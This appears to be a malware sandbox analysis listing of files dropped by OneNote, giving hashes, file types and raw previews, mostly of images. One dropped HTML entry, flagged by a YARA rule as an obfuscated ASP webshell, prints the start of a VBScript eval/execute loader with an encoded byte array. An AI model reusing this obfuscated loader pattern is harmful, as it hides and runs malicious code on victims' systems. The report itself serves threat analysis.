                                                                                                                                            Preview:.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d..+.IDATx^.{...u./-...&....6..+z..Q."b*. &M.d-e.*.. ....J..Z-T.Z$....R..F...%*`bn..<.....W.E ..w....^...;g..[w.5w.9g...3......t8t.P.?$@.$@.5...=.8qb.... ...5...a=...#.y. ...@B.....am. .. .......$@.$`.....G.B.$@..S... ...C.zj.#[!.. ..).......!@=..........}..H.........VH..H.z.>@.$@.v.PO.pd+$@.$@=e. .. .;...v8... ...................f.o_o{....~t...n.S.N..?..._..L;J.H ..,....7.}...|....7...b...|.........ObVa1. .?.X.....~.....t2..V>.b.}..0.F....%`GO7.n#~..F....K.~...FX..H.^....k.Z/.2v.W..M.<.;$...v.t..,UO.-]............D.....o.J..Y........5.%.l....{.....'O..dC$....=uks..;{x.,.N.=.."..Q]..w>.E.H........AV=...f.&. ..ip}._0.~[pf.`..9..v.W.,..2.E.$P........+...OcC.H..=..|..[..g%(h.....W...?...UDh..T$..?....|.]..)?[Wo.h.'..2P.1..!.......$.NO.5..}...c.;...~.x,|Q....B..6.@>..y..}...m...D~z....L#.0`_.`.s?|....I.....a...=N....c.._.2.._..6 .]...5....{.^>.lM..;n...k..9J..S.G..{.

                                                                                                                                            C:\Users\user\AppData\Local\Temp\{A380EB13-19C1-473B-961C-DA870E149A1E}

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:PNG image data, 39 x 579, 8-bit colormap, non-interlaced
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):515
                                                                                                                                            Entropy (8bit):6.740133870626016
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:12:6v/7su2/c30mqkg9VgFHe7Ll8UmJX/N+1Zmkk8f3lbtI4:4mc38gFHe18lkk8f3lbth
                                                                                                                                            MD5:E96BE30D892A5412CF262FEE652921CA
                                                                                                                                            SHA1:8190A0BFE21D04BC6F3A406E91B87CA69C03A2DE
                                                                                                                                            SHA-256:0E31DA4DFCFF4A36C64C1CE940362D2309769F36369E4C43C317D5F2FA15658E
                                                                                                                                            SHA-512:D647F51ABBD013226A6ADD0D551D058C633F867F9AF5A9E099B85D6E291D220F7B85958B07381CD4C7C4F72356DBAFE2A86932AE398E28C56CDDF0744E92EE24
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.PNG........IHDR...'...C........b...`PLTE..................................................................................................bKGD....H....cmPPJCmp0712....H.s....9IDATx^..I..@.C..<..?mo.#C((.J}...~..B...b.I.i.\<.e.....(p.I.EO...q.x.......dRz....K..b0.:.<c.o..0.x\:...F....I&..ap....."P@....DO...q)p*..@Y.CL2)=......1.........4....._.G..^`..lDO...q...X....SL..z....K..#.L#..I6..ap.Ls.,....7&..ap.p..lI...,GO...q.....k.n1..4......3=.f.x.$..4.....o....x.$+..0.x\.,&6...............IEND.B`.

                                                                                                                                            C:\Users\user\AppData\Local\Temp\{A44E2934-072C-4B60-AF52-A5CF6DCCBBD9}

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:JPEG image data, JFIF standard 1.01, resolution (DPCM), density 28x28, segment length 16, baseline, precision 8, 814x45, components 3
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):1717
                                                                                                                                            Entropy (8bit):7.154087739587035
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:48:N9YMzO6BOfqH/dAIWpdAIWpdAIWpdAIWUtr/SD:/hzJgfqHaPYPYPYPUt/i
                                                                                                                                            MD5:943371B39CA847674998535110462220
                                                                                                                                            SHA1:5CA79B7BD7E0E93271463FAEF3280F1644CBA073
                                                                                                                                            SHA-256:9C552717E8D5079BBB226948641FF13532DF3D7BE434C6CE545F1692FA57D45A
                                                                                                                                            SHA-512:812541836C8B6F356A4D530E5CCF1CFDCC4CA54AF048CAC19FE86707CE5EA0F41D73C501821AC627AD330291EF58C040DFC017923A7886CEEC308048DA2CE7C9
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:......JFIF.............C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222......-...."........................................&.....................U.....1T..S.R.Q.................................................R....Q.a............?..d.. ...............................................+A...Z+E...V+E...U..R.....}........Q..Ah....Ah..b.AX..b.PZ+A...V+E...V..J*....Q...b.Q..Ah....Ah..b.Ah..b.PZ*.(.@z.?.`;2.......................................................Q...b.Q..EZ*.(..Z>.G.....`Z+E......J*....F+D...F+E.......b.Q...h....PZ+E...V+E......J*....F+D...F+E..............[u#...a-...f<.9^[...l0..H..6.Kn.t...&..3a...GG...[u#..8.y6.q..%.R:8....6a.+.3..a-....l0..H..9^M..f..m..3a...GM.q..m..6.Kn.tq..%.R:l.W.lg...[u#...a-...f.r..c8.....f..m..0.....l0..H..6.Kn.t...&..3a...GG...[u#..8.y6.q..%.R:8....6a.+.3..a-....l0..H..9^M..f..m..3a...GM.q..m..6.Kn.tq..%.R:l.W.lg...[u#...a-...f.r..c8.....f..m.

                                                                                                                                            C:\Users\user\AppData\Local\Temp\{A5432F7B-3063-49EC-88AF-F7C6D8DBEDF4}.bin

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):11886
                                                                                                                                            Entropy (8bit):7.946442244439929
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:192:sqNuEpzsnKxkfLaZCdMh+cLApmRausyZwYMAisQKShDBlhr34ckckcZ:JNu6DMLaZsMhtLAIa0wYMAvI5V4DDQ
                                                                                                                                            MD5:875CFB3B5C3619253223731E8C9879E5
                                                                                                                                            SHA1:6372F4F5BEB6EEAE3EDBE5B62EE73039B40AD01E
                                                                                                                                            SHA-256:CC69BAE5D2C8F56B28BA4E3C6A11F57C4E8CCCE69943ACFBE7E63B4FC90EE5F2
                                                                                                                                            SHA-512:47F45A3275B8454F8000F4567153DD7D4AF3012005D8E34CB18AED6AD69083BEC753E607F275FBF3EFCCB7BA00310A04ADFBD5FA5B73E6BBE47CE73901C35CA8
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..x.U..I...JB..;H..."..(U.EE\\..._v]W..b...Az..{G:J..B.$...H.IHB.o2xE..3gf..w..2....w..s|.....C.$@.$.....t.!........8......RR....<...6..P||....$@.$@...PO..$@.$ ...T.GZ!.. ..)c..H........H+$@.$@=e.........S1.i..H....... ...C.z*.#........1@.$@.b.PO.p... ....2.H..H@......B.$@..S.......!@=..VH..H.z.. .. .1...b8......PO..$@.$ ...T.GZ!.. ..)c..H........H+$@.$@=e.........S1.i..H....... ...C.'++kH.G.=Z!.U...73o^.IH..O|jrj.D.......I.M.........Kph.............R.x.......RU8_".......j.......B"O.z.|.9.."..L....Y.d.Rej.-Y.dhX....:.xH.z.!(>&..4.....O.<..T\.%a..e...*..UnR....+j...2.."..M.O>.z......T...].j....m...S.`..&..)....f..2..............+..SP..?.a...=.....3......K.zj.5.fP.......2:..?.....%....d.qxC..W.~.._....!.W..6....iJ)*.(..wg.}.]sw\.r]...r"...e_-....5_9.YN'...PO-.d.:.%..wZQ...H...JMJ.6c....|g*..,.3.....T...o..Nyc.W.....A.3.._...U%...PG.z.....&.%.v....AIm.....~.

                                                                                                                                            C:\Users\user\AppData\Local\Temp\{A5AC1CBA-D552-4D56-B7BE-0E3D520EE849}.bin

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:PNG image data, 454 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):8184
                                                                                                                                            Entropy (8bit):7.807848176906598
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:192:ExqMHYnnEnntvA4Mesu3SXHycmfIEFQp1r/:E0MGEn29esuiXHt0FQp1
                                                                                                                                            MD5:5B386BF9A20766956A84F67F913F23D7
                                                                                                                                            SHA1:6E72E51F5B4FA64E52D2B80B41409B3DB927A3C7
                                                                                                                                            SHA-256:DDF6A1D5B29BD69C65A148B1247FDE8389CC56865E4398E4CBDCBD68A6555043
                                                                                                                                            SHA-512:99B4109439D9A688D7747C6847E0FF7399CDA01A89C3181789F913E757A82EE4727F95E506F4B01930EFC7C6E229B94BB89E385B56BC009AB5CFE332585660C5
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.PNG........IHDR.............s>.Q....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^...]...!.......!.YTP.A......-..r..$.E.J.I;....T.M.UE[..Q..x....wKB=.m...4.%..|:...9...\{..o.3..g.o~..~s...k...X.r....... ..@Gggg.?.... P_.]]]..*Iu....C...h..$...:... ..... .\.......@R..... ..$.k....@0.Hj0.8... ..r.@....F.I...G.....T...@.... ..P........5...@ ..$5.J.A...@R.. ....#...C.#.@..H*... ..`...`(q...@.I..... ......%. ... .\.......@R..... ..$.k....@0.Hj0.8... ..r.@....F.I...G.....T...@.... ..P........5...@ ..$5.J.A...@R.. ....#...C.#.@..H*... ..`...`(q...@.I..... ......%. ... .\.......@R..... ..$.k....@0.Hj0.8... ..r.@....F.I...G.....T...@.... ..P........5...@ ..$5.J.A..............W_...1c.l..6..`...@ ..I.S..I.I'...5.\..;....'1. ...........c..k.u.Qs..}..g#b.j.@..Y..QR...n.!...-......h..Z.......Xw.U.~q... ..@.%.'............. P..E.T.b.:j.(F..p.... .C.}3.'.|..z..w.a.....\{.:.4[.lY..~...x..'/....g....J..9.K_...'...:..;)......SO=u..E... Py.qf..}O7.o....u?:....6~~..9...?7.

                                                                                                                                            C:\Users\user\AppData\Local\Temp\{A73B8B41-A3B3-488D-B3C3-758F942CA19F}.bin

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:PNG image data, 742 x 104, 8-bit/color RGB, non-interlaced
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):13030
                                                                                                                                            Entropy (8bit):7.948664903731204
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:384:/06ULmwT2RqfILhmLy4tNpYGL0mvBQhTMHX4PCIVYm:s6USI2RqfGhmDrpYM0ofHX4aIVYm
                                                                                                                                            MD5:17E9FF9F735102231846936F0E2BAF1A
                                                                                                                                            SHA1:9EC1AE8A3AD55C48C02427D842D6E38DA85B5145
                                                                                                                                            SHA-256:DD1CA8DA90893E0B63ABFDD9E60CF2BF844B311964E9D9DDB855C21FCA156EBB
                                                                                                                                            SHA-512:71E690D6C87B09659296E6E6DDC8E3F91035DD80C5CE875FA557763E8138900C27FB492885291CEE203D65BCEE8C20C9C39E0590A5FD32B8A00BEB3E3F6D6E8F
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.PNG........IHDR.......h.....2......sRGB.........gAMA......a.....pHYs..........o.d..2{IDATx^.wp\.....sN$...$.).Q.")R2ei,kl.%....r..vm.x<...\...u.U.g.ry=..uX.cK.dI..I1G..$.".Fg.q...N.nt...3.w.w..~.v.O.....K.....A@.....A ..H.n.D;A@.....A@......e.y ..... ...1..P..xH.. ..... ..e.9 ..... ...1..P..xH.. ..... ..e.9 ..... ...1.@.$9..S....A@..4....^C..F..VR\\TT.........aHII1......VS..g........... .*....z..|Ek.......<R../55+33;;;+..Y..WC..#...P..... ...s#0::......522...,.v..D......_.....9.2N.L.'..F$.....e..!..... ...N...`1....G.....'&,f..f.X....!.lp......I_........J..z.R,YbYd&.... ......~"b\...b.Z.SS.....c....&..Yl-............... ..[...BY......... ... 1..Z..6NN............._.zw....MKK.Z..vMMnnn.4.v....,q..e... .D%....Q......._..p*M......22..e...k.}.....qU....S.a...~....P..}v.. ...1..2...F.GCC#...].=..C..n#...K+..MOO..........."....d^2=.{....U.p.h%.%n...D.....XB..b..'''....?h.b.B\v..^Q^.UC............Q...I.....U.VD...P..{.2"A@...b..V...........jF.x.

                                                                                                                                            C:\Users\user\AppData\Local\Temp\{A7DEC174-262B-4913-BE2F-051CB37BE409}

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:HTML document, ASCII text, with very long lines (18859), with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):23607
                                                                                                                                            Entropy (8bit):4.399875668688412
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:384:0ttRtO74aTReR26QLaZnwd7T9YLejbMqQU4R+GWXeRRjH7s/vNousrM277sLyore:0v7xS+6r2ZiNe7Foel6nG
                                                                                                                                            MD5:7146557E5F41764249375BC3F78D1940
                                                                                                                                            SHA1:9C6AD74C4E2C4DC1E5A27164A399F81D06710D1D
                                                                                                                                            SHA-256:787D8B615BD835EAE99904E031B35645D8898909E4AAB512AF64171841F8033B
                                                                                                                                            SHA-512:E56C196E66B5A19518591189EA682AC5F84ACACC47DF9B759EDE5559F9BB8F5FBB86955D23FE16D08225526F867D05C135B3E7BFD9EEECFE203BB4BBE820D891
                                                                                                                                            Malicious:false
                                                                                                                                            Yara Hits:
                                                                                                                                            • Rule: webshell_asp_obfuscated, Description: ASP webshell obfuscated, Source: C:\Users\user\AppData\Local\Temp\{A7DEC174-262B-4913-BE2F-051CB37BE409}, Author: Arnim Rupp
                                                                                                                                            Preview:<html><head><script language="vbscript">..Sub VnnTDIHERQAuvaRpjX(OoApSvEoSGyffAOvR) : eval("execute(OoApSvEoSGyffAOvR)") : End Sub..xzUpxubNpiSVvciVOyyKliJJ = array(211, 232, 133, 172, 224, 191, 177, 194, 122, 215, 179, 235, 186, 182, 191, 149, 209, 213, 199, 227, 89, 121, 139, 187, 180, 133, 183, 185, 151, 136, 130, 106, 161, 200, 189, 130, 187, 167, 198, 136, 161, 116, 144, 196, 175, 175, 204, 191, 159, 217, 207, 184, 213, 224, 120, 108, 166, 204, 230, 174, 224, 226, 212, 188, 212, 151, 155, 179, 211, 199, 181, 239, 184, 220, 167, 224, 146, 178, 184, 188, 171, 236, 118, 162, 128, 132, 163, 213, 145, 168, 182, 210, 144, 140, 231, 198, 171, 223, 198, 175, 222, 218, 237, 225, 220, 137, 111, 170, 171, 177, 149, 229, 219, 192, 190, 207, 197, 176, 180, 194, 203, 173, 165, 205, 188, 228, 208, 212, 178, 205, 193, 165, 175, 190, 195, 179, 230, 189, 205, 115, 142, 137, 182, 188, 173, 213, 142, 184, 139, 128, 154, 176, 170, 185, 147, 166, 135, 109, 103, 128, 154, 176, 219, 111, 227, 220, 150, 1

                                                                                                                                            C:\Users\user\AppData\Local\Temp\{A8029CD2-90A7-484C-84F6-14698CF3F31A}

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):41893
                                                                                                                                            Entropy (8bit):7.52654558351485
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:768:pZvVQkUbOHxx3pvVmO5rsP5gUdXwFMuv53knzyncaXgRDqPU:pZkijV5wScXwFMYknzucaXgRyU
                                                                                                                                            MD5:F25427EFECFEE786D5A9F630726DD140
                                                                                                                                            SHA1:BC612A86FF985AB569ED1A1EA5FFC4FDB18FC605
                                                                                                                                            SHA-256:5A36960DF32817E8426BD40A88F88B04FB55B84BAEF60F1E71E0872217FDB134
                                                                                                                                            SHA-512:B102F34385196D630F198667E874F25ADBC737426FDAE0747EC799B33632E5DC92999C7C715DC84D904342738930267AB1709870BDAA842243E4C283FE5E1554
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d...........................................................................................!.1AQ....aq......"......2...Xx..9BRr#.b3$..&..g.8....%F'G.(H.Ss..D5E..v..W..Cc.deu..7w.h.).....................!.1....A..Qaq...Ttu.6..."R..5...2B..S....bcs.Dd%&r3C...#$...Ue.............?..R...%.R...t.MQ*.l...v...V]..n...Zw....M....4..F.&&bb0.:]l......ay.r<..3.l.Q^.........I54.N2.8..2s...w..r6.......[1Zh....O...9..>...B......x]...r.\.\..v..~....y.QT.3.......=....r..}.l.....o;....M..C1....w)...+o1f.]...MoA.E..s5..i.\....miGsy..m\.Zj....I'YU.\tU6La5v.>.K..m.]1.......k..0....</5v.V7lY.e.vV.+./[....f..u{....s.}.Rb.Z.....Y.6]..m....V.\...Mr.=r...K...l..%..m^.......X.(..fG..[F*ly.jL.a4..vs..o.e..q.9km..w1.yg.....r_.*h.n..5i.-.{Y.l...<...'Or.s..Z....../JP.....\FV.S..............m

                                                                                                                                            C:\Users\user\AppData\Local\Temp\{AA727159-35A3-486E-89EB-C396442A4321}.bin

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:PNG image data, 340 x 79, 8-bit/color RGB, non-interlaced
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):4490
                                                                                                                                            Entropy (8bit):7.928016176674318
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:96:WXKr7Xwf6Obg+XaGOnsjbbGSb+ydWtRvEOhDE6XqPeosv02tR45boo:3rTUgXZnsHKSb+n+8DdKlwm
                                                                                                                                            MD5:7F161B19B937AB48D4FD2F6E5E16FDBD
                                                                                                                                            SHA1:BDCE4F1C73E87E609A7FDF245A512CA4F73B35B9
                                                                                                                                            SHA-256:C863C5E71D1116D69561BD0637F4FE4C4240E9CED05B8A5B056073AD13E6495D
                                                                                                                                            SHA-512:E915B76FAAC9512D2AD11CF4E4530A19BEA1C7D8508BC218C69CB041F1EEABA3E2E03B1D56E61B032A6418829752C21B8354AF1335466D7E1528A06E6742A461
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.PNG........IHDR...T...O.....;.......sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..p.U..'...rD.WX.... Q.. ....."$.ZHP.Z...C...........R..%G8R..... .R.C6..A.b...0...^...#..g..........z2.....nB...l..X.&._.a,...a,...a,...a,...a,._.73'N..ukeee.6mZ.n.m.G.}...n...a.9s.DGG....y...8??.o.pE1....Y.,......).ca.i.M.:5$$.........Lr...ye........6...8...z.-r....d.(.xc..U..^11...._>.QX..y..2...T...sss1..."A.?_.;w..S.F>......4.G.......D.|...@.K...............C...k...P...q....6.`QQEE................7;;;.._\q.k.|...\.z..6j>..n....Y.&G*.n.S$))).....r........}.{[Dv:,..w..A...`..........a.~.N.f.s...P...*..'7n....eK....+.n;:.W..C..9}..O..D.q..X..5i.s~en.c..F&..?.....l.]3r...W`..#..7o..R.@^..*...W..?}t...{.B.8..D...UPa..~..C...|.C].a.9..R...c.Y0..9.u...d...C.......X.U....WK.....5...'..PM.`...<. ._.z.F^^.EH.K>_.0.d..S...Yj<..~.5.?l.fZ0.@d.....*..G...K.....e...b.|e..Q.4.....('z...!G.....2..XQx\......X...2.\h..X~.e....Z....=....C.1.......w.....d.z.

                                                                                                                                            C:\Users\user\AppData\Local\Temp\{AC43D91C-E5A9-4983-928B-E495CB90630A}

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:PNG image data, 50 x 556, 8-bit colormap, non-interlaced
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):977
                                                                                                                                            Entropy (8bit):7.231269197132181
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:12:6v/7QiFJaY/z+obuqFA4fypjQSbtBK+lcqNGSbb7XTJArRRzN5DjNRkPmu5cCbR2:x0QY7xbjy9pY0JPXLTWroeuCCbX0
                                                                                                                                            MD5:B7F74C18002A81A578A4EE60C407A8D3
                                                                                                                                            SHA1:70A7D4BB1B3ADF4397D168AD0D81B286F88EBDE0
                                                                                                                                            SHA-256:95F59A0433050180D4C0E8858B83363D51BEA6752A8B7CA516A8677854D8F5B6
                                                                                                                                            SHA-512:13186A7CDCE80BCA9D2238666D6D7A989FA1887EABFA5D8A9A63EEC304DFD4BE8EFF652205FA56E1D1CEE7D3680AF8C70A952AF73AB3C246400E8D4EBECBDBA9
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.PNG........IHDR...2...,........A....PLTE...................................................................................................................................................................................$.y.....bKGD....H....cmPPJCmp0712....H.s.....IDATx^...0.D_.......cck.....%a...X.a0Y...-..!.G...[....(.r.H.$...1 .zq.4V.e|a.6.X..4..kl.%....=w....6..TN.....{.4..T/.z...../.....3..!~..t.#b..^.....E!.SFb ...-.....^...,..C.!.b...i._c...s.X.w.. lsQH..H.gKc@@...i. ....m...;Ci....@G.; V{..lO..\.R9e$..{.....P...E.+.2.0D.B,..P...56.?......K.6..TN....^z.4..T/.z...../.....3..!~..t.]b........E!.SFb ...-.....^...,..C.!.b...i._c..Y.O...?.9k2.M.?5 .n.P...,...d._..%M?....6....,.1..R.4.a.R.+..U.Q..P...vd..T........j .]@....."..lJ../.90.4...Y. ...9.%...{......Hc%.....i..%M?aG..H....o.q.......4.......X.d9.r..CI.O.5.Ri0?.s\b....w...>/k..4V.)Y....P...vd..T........j .]@....."..lJ../.90..2..MP..l..?....K.X.....IEND.B`.

                                                                                                                                            C:\Users\user\AppData\Local\Temp\{AEB64CFC-B3A4-4B12-8696-728C39E6A0EB}

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop 7.0, datetime=2004:03:04 13:19:29], progressive, precision 8, 221x792, components 3
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):24268
                                                                                                                                            Entropy (8bit):6.946124661664625
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:384:d2wiieoHTRh5a1HAteZCWOZIM+L7WhNjYn:8wHFHJ+/OZIKhNO
                                                                                                                                            MD5:3CD906D179F59DDFA112510C7E996351
                                                                                                                                            SHA1:48CDB3685606EDD79D5BCDF0D7267B8B1CCBD5A8
                                                                                                                                            SHA-256:1591FD26E7FFF5BE97431D0ED3D0ADE5CFC5FA74E3D7EC282FD242160CE68C1F
                                                                                                                                            SHA-512:2048CBA13AF532FF2BCC7B8B40541993234BD1A8AB6DE47B889AF3F3E4571F9C5A22996D0B1C16DD6603233F6066A1A2A97C16A6020BEDD0826B83BAD0075512
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:......JFIF.....H.H......Exif..MM.*.............................b...........j.(...........1.........r.2...........i.................H.......H....Adobe Photoshop 7.0.2004:03:04 13:19:29.....................................................................................(.....................&...................H.......H..........JFIF.....H.H......Adobe_CM......Adobe.d...................................................................................................................................................$.."................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?.....)......[]t.\Z..g......A....&D.$LH._..X..Xl...`....cZ.X.........>......f.Z.X...]..~L.S..@..I$..I.IO.....x...s.g.[f.h{9..

                                                                                                                                            C:\Users\user\AppData\Local\Temp\{B02B1D86-08C4-442D-907C-9E9D393F2074}

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, baseline, precision 8, 814x105, components 3
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):12654
                                                                                                                                            Entropy (8bit):7.745439197485533
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:384:JheN2cq6MLu6MLGu54cHeNzhcmhcDu53eNE3UPkhrxvu:Ji2Wix7fzVsbE3Zm
                                                                                                                                            MD5:4BCCCDBB4273ECEBE216C84930A8D0B2
                                                                                                                                            SHA1:FFBF617787E27BC94D9BAF89F2FE34A2BD42794B
                                                                                                                                            SHA-256:474F9A8C25D5E21192315397EA995B1E11E2C1608157C6E0277688091BFD136A
                                                                                                                                            SHA-512:DAD73A8C0E293B88685C0C71EF15E0DC95EE39B7FC9F849DE5D634173FD9FA0AF0AA96742D9E94BE03556AA4A817D5001C95A6736EAD5D5DF03661876785EB74
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:......JFIF.....H.H.....C....................................................................C.......................................................................i..............................................E.....................U....V...f..ASTc.......de.1Qq...!Rb....Ca."r.................................B....................b....Ra.....!Qc.....AS.1U.."C...2Bq...$#3%&.............?......3.....~......:..g..s"......:..g..s"..ic..Vk.f.. :..f..h.....Vk.f.. :..f..h.....Vk.f.. :..f..h.....Vk.f.. :..f..h.....Vk.f.. ..0...Q_..X..V5E~..c..X...@u...cTW...0...Q_..;.m.....@w...Q.+....*.4W...lUFh....v..._..wn...dW....y._..v..E~...*...@wn...dW....y._...v..U..@wn...d..{`;.|U.2g...*.3...:.0?ViN.z.@w...4.M.:m..`~..i7...q...I....J.`l...W..n..PQTiB...6....+..sj.*."...6....+..WA...x..A........(.N6`..AD.q.....'S...t.Q:.l.......f.]..N..0.. .u8..A........_W..Y...}.C...~....&.E~....&.E~....&.E~....&.E~....&.E~....&.E~....&.E~....&.E~....&.E~....&.E~....&.E~.v..?U..^.r..}..Bep

                                                                                                                                            C:\Users\user\AppData\Local\Temp\{B0588943-5BD8-445E-9916-4E9B519A470A}.bin

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:PNG image data, 165 x 131, 8-bit/color RGB, non-interlaced
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):3879
                                                                                                                                            Entropy (8bit):7.9281351307465044
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:96:k1hccap27HGVhY2Kn+A3RS+HG3dXrjmg26vh:k1hccewIhYxRmR5
                                                                                                                                            MD5:C451B2A146BDD7EF33AB3EA27268796D
                                                                                                                                            SHA1:C040BA2F31342CBCBF597C96D4D6EDB83D473B77
                                                                                                                                            SHA-256:4C264B2A6E88712234DAA8E3A8D630CBF4EEB338554CB0B794D8031F8943EE65
                                                                                                                                            SHA-512:55915A304B261BC6F38F5CFE0389D5195F85FE2C1DA325019C3AA391E8B1773091E078A35BD57F8CEE0BA035956382AE33790EF462053FCE711EEA9665B7F917
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.PNG........IHDR.............c.L.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.].p.U..g..Bp!...\.!.`pA.+....H.U..."Z..*U.. ..P.D.-.$..,,..$.g.......CB.l......I.g.pc..Lf..~.=.~]S.....w.9..w..'...!L..A ..^.t...v..s4&&&%%..6..`..:.G.D@.7.qS...K....[..,...o...p..2.%..B.Y....|;..gy+.[..,...o...p..2.%..B.Y....|;..gy+.[..,...og...}.W..z\?...y..;_t....=..e\.....6.M|[...B._....[_.\^Pf.....f.....\l..../6....<S.4./..m.......l....B'.n...O...yc...........X...P...k....t..9tf.g>....e..Sy'.L+**.]{..a...,7...p..+......K..y.9p...I{..i58....v..5.`Op.....{.......8.._.S.........p..).........;.....y...2...b.[>gP....C..G.H...........Osp...)..9x!...W.,..^....$r.p.sOJ.l..=.x.9s&:..........h.`..W"V..|.l{..72.....zv@.#.<.........../....F|...c...4.W....:uj@1...~.X............^si....Z..I~.Q.<.....NAOq...+i`.)...$L..gV.6#.....F$..hD.g.L-\..H._.u..]4......h...T.BK\\.Z222....7))..h...1??...~.-i=...X...~h....y[.............p.....x....c...{....Uh.7n.....

                                                                                                                                            C:\Users\user\AppData\Local\Temp\{B1201187-3404-48AA-8C23-016394EE233F}.bin

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:PNG image data, 563 x 211, 8-bit/color RGB, non-interlaced
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):14458
                                                                                                                                            Entropy (8bit):7.944094738048628
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:384:uuT43eqJy2jEeSZE0onrAFAOpn5ytFfNrfIkBQTYz8ynth2EB:EugQeS+nrAFZ8tJNrfRQM4ynH2EB
                                                                                                                                            MD5:7CEB71F78A193F8C9F7FFDA5F81AEBD8
                                                                                                                                            SHA1:EEC1597705EFF1A527C246B86A71878185BA6B1B
                                                                                                                                            SHA-256:77911FF7AEAB8FCCAF36DE6E1183FFE1A6C27F77B5714EE780976CE5189E8FD0
                                                                                                                                            SHA-512:1D1AB19B64E1E2ABCA61AE78B3B50310B0A6CF19D2ECFCB4499D8D0BF68600B4D95BC0945EF9FF9B1D016ED61EAC518DCCA1A426F460317C07AD51E2E047948C
                                                                                                                                            Malicious:false
